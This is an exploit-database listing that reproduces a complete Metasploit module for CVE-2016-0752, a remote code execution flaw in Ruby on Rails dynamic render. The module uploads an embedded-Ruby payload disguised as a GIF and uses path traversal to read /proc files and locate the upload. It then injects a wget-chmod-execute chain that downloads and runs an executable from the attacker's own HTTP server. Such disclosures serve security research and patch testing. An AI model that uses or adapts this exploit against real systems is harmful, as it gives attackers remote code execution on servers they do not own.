Ruby on Rails Dynamic Render File Upload Remote Code Execution



EKU-ID: 5921 CVE: 2016-0752 OSVDB-ID:
Author: mr_me Published: 2016-10-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in the explicit render
        method when leveraging user parameters.
        This module has been tested across multiple versions of Ruby on Rails.
        The technique used by this module requires the specified
        endpoint to be using dynamic render paths, such as the following example:

        def show
          render params[:id]
        end

        Also, the vulnerable target will need a POST endpoint for the TempFile upload, this
        can literally be any endpoint. This module doesnt use the log inclusion method of
        exploitation due to it not being universal enough. Instead, a new code injection
        technique was found and used whereby an attacker can upload temporary image files
        against any POST endpoint and use them for the inclusion attack. Finally, you only
        get one shot at this if you are testing with the builtin rails server, use caution.
      },
      'Author'         =>
        [
          'mr_me <mr_me@offensive-security.com>',      # necromanced old bug & discovered new vector rce vector
          'John Poulin (forced-request)'               # original render bug finder
        ],
      'References'  =>
        [
          [ 'CVE', '2016-0752'],
          [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'],        # rails patch
          [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'],  # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016
          [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'],                     # John's original exploit
        ],
      'License'        => MSF_LICENSE,
      'Platform'    => ['linux', 'bsd'],
      'Arch'        => ARCH_X86,
      'Payload'        =>
        {
          'DisableNops' => true,
        },
      'Privileged'     => false,
      'Targets'     =>
        [
          [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ]                                                   # Other versions are also affected
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Oct 16 2016'))
    register_options(
      [
        Opt::RPORT(3000),
        OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]),
        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
      ], self.class)
  end

  def check

    # this is the check for the dev environment
    res = send_request_cgi({
      'uri'       =>  normalize_uri(datastore['URIPATH'], "%2f"),
      'method'    =>  'GET',
    }, 60)

    # if the page controller is dynamically rendering, its for sure vuln
    if res and res.body =~ /render params/
      return CheckCode::Vulnerable
    end

    # this is the check for the prod environment
    res = send_request_cgi({
      'uri'       =>  normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"),
      'method'    =>  'GET',
    }, 60)

    # if we can read files, its likley we can execute code
    if res and res.body =~ /ruby/
      return CheckCode::Appears
    end
    return CheckCode::Safe
  end

  def on_request_uri(cli, request)
    if (not @pl)
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end

  def send_payload
    @bd = rand_text_alpha(8+rand(8))
    fn  = rand_text_alpha(8+rand(8))
    un  = rand_text_alpha(8+rand(8))
    pn  = rand_text_alpha(8+rand(8))
    register_file_for_cleanup("/tmp/#{@bd}")
    cmd  = "wget #{@service_url} -O /tmp/#{@bd};"
    cmd << "chmod 755 /tmp/#{@bd};"
    cmd << "/tmp/#{@bd}"
    pay = "<%=`#{cmd}`%>"
    print_status("uploading image...")
    data = Rex::MIME::Message.new
    data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"')
    res = send_request_cgi({
      'method' => 'POST',
      'cookie' => @cookie,
      'uri'    => normalize_uri(datastore['URIPATH'], pn),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data.to_s
    })
    if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)&gt;/
      @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)&gt;/
      return true
    else

      # this is where we pull the log file
      if leak_log
        return true
      end
    end
    return false
  end

  def leak_log

    # path to the log /proc/self/fd/7
    # this bypasses the extension check
    res = send_request_cgi({
      'uri'       =>  normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"),
      'method'    =>  'GET',
    }, 60)

    if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
      @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
      return true
    end
    return false
  end

  def start_http_server
    @pl = generate_payload_exe
    @elf_sent = false
    downfile = rand_text_alpha(8+rand(8))
    resource_uri = '/' + downfile
    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
      srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
    else
      srv_host = datastore['SRVHOST']
    end

    # do not use SSL for the attacking web server
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end

    @service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
    service_url_payload = srv_host + resource_uri
    print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
    start_service({'Uri' => {
      'Proc' => Proc.new { |cli, req|
        on_request_uri(cli, req)
      },
      'Path' => resource_uri
    }})
    datastore['SSL'] = true if ssl_restore
    connect
  end

  def render_tmpfile
    @path.gsub!(/\//, '%2f')
    res = send_request_cgi({
      'uri'       =>  normalize_uri(datastore['URIPATH'], @path),
      'method'    =>  'GET',
    }, 1)
  end

  def exploit
      print_status("Sending initial request to detect exploitability")
      start_http_server
      if send_payload
        print_good("injected payload")
        render_tmpfile

        # we need to delay, for the stager
        select(nil, nil, nil, 5)
      end
  end
end